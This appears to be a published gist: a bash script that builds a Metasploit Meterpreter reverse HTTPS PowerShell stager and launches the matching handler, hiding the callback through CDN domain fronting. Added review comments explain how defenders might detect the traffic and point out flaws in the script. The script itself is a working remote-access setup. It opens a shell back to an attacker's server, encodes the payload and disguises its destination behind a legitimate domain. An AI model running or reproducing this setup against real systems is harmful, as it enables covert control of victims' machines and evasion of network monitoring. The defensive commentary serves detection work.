
@vp777
Created July 2, 2019 15:20
#!/bin/bash
# Builds a Metasploit windows/meterpreter/reverse_https stager and then starts
# the matching multi/handler, with the callback set up for domain fronting
# through a CDN.
#
# Arguments:
#   $1 - "frontable" domain, used as LHOST for both stager and handler
#        (default: www.amazon.co.uk)
#   $2 - "fronted" domain, used as HttpHostHeader for both stager and handler
#        (default: your.cloudfront.net)
#
# NOTE(review, defender view): LHOST and HttpHostHeader are deliberately
# different names. The name visible to DNS and in the TLS SNI would be expected
# to be the frontable domain, while the fronted domain appears only in the HTTP
# Host header inside the TLS session. DNS and flow logs alone therefore do not
# show the real destination. Detection relies on a TLS-inspecting proxy that
# compares SNI with Host, on the CDN rejecting mismatched requests, or on
# endpoint telemetry. The stager is emitted as a PowerShell command
# (-f psh-cmd), so PowerShell command-line and script-block logging apply.
frontable_domain=${1:-www.amazon.co.uk}
fronted_domain=${2:-your.cloudfront.net}
# Placeholder as published; substituted into HandlerSSLCert in the listener.
cert_path="ssl cert path"
# cdn_port becomes the stager's LPORT; local_port becomes the handler's LPORT.
cdn_port=443
local_port=443
echo "Frontable domain: $frontable_domain, Fronted: $fronted_domain"
# Hard-coded Metasploit checkout location; both tools are run from it.
msfpath="/root/metasploit-framework"
msfvenom="${msfpath}/msfvenom"
msfconsole="${msfpath}/msfconsole"
# Command template; the %name% tokens are filled in by the substitutions below.
# ${var/pattern/replacement} replaces only the first match, and each token
# occurs once in the template.
_stager_gen="${msfvenom} -p windows/meterpreter/reverse_https LHOST=%frontable_domain% LPORT=%cdn_port% HttpHostHeader=%fronted_domain% StagerVerifySSLCert=true PayloadUUIDTracking=true PayloadUUIDName=bocrev -f psh-cmd"
stager_gen=${_stager_gen/'%frontable_domain%'/$frontable_domain}
stager_gen=${stager_gen/'%fronted_domain%'/$fronted_domain}
stager_gen=${stager_gen/'%cdn_port%'/$cdn_port}
# Unquoted expansion: the string is word-split into the command and its
# arguments. Whitespace or glob characters in $1/$2 would be split or expanded
# as well; the script does not validate its arguments.
$stager_gen
# Fixed pause between printing the stager and starting the handler; the source
# does not state the reason.
sleep 10
#listener_file="df_un_en.rctemplate"
#_listener=$(cat "$listener_file")
# Inline msfconsole resource script (the commented-out lines above would have
# read it from a template file instead). It configures exploit/multi/handler for
# the same payload, enables stage encoding with x86/shikata_ga_nai, keeps the
# handler alive after a session (ExitOnSession false) and starts it as a
# background job (exploit -j -z).
_listener="
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST %frontable_domain%
set LPORT %local_port%
set OverrideRequestHost true
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
set HttpHostHeader %fronted_domain%
set HandlerSSLCert %cert_path%
set IgnoreUnknownPayloads true
set StagerVerifySSLCert true
set ExitOnSession false
exploit -j -z
"
listener=${_listener/'%frontable_domain%'/$frontable_domain}
listener=${listener/'%fronted_domain%'/$fronted_domain}
# %cdn_port% does not occur in the listener template, so this is a no-op.
listener=${listener/'%cdn_port%'/$cdn_port}
listener=${listener/'%local_port%'/$local_port}
listener=${listener/'%cert_path%'/$cert_path}
# The resource script is handed to msfconsole through process substitution
# rather than a file on disk.
${msfconsole} -r <(echo "$listener")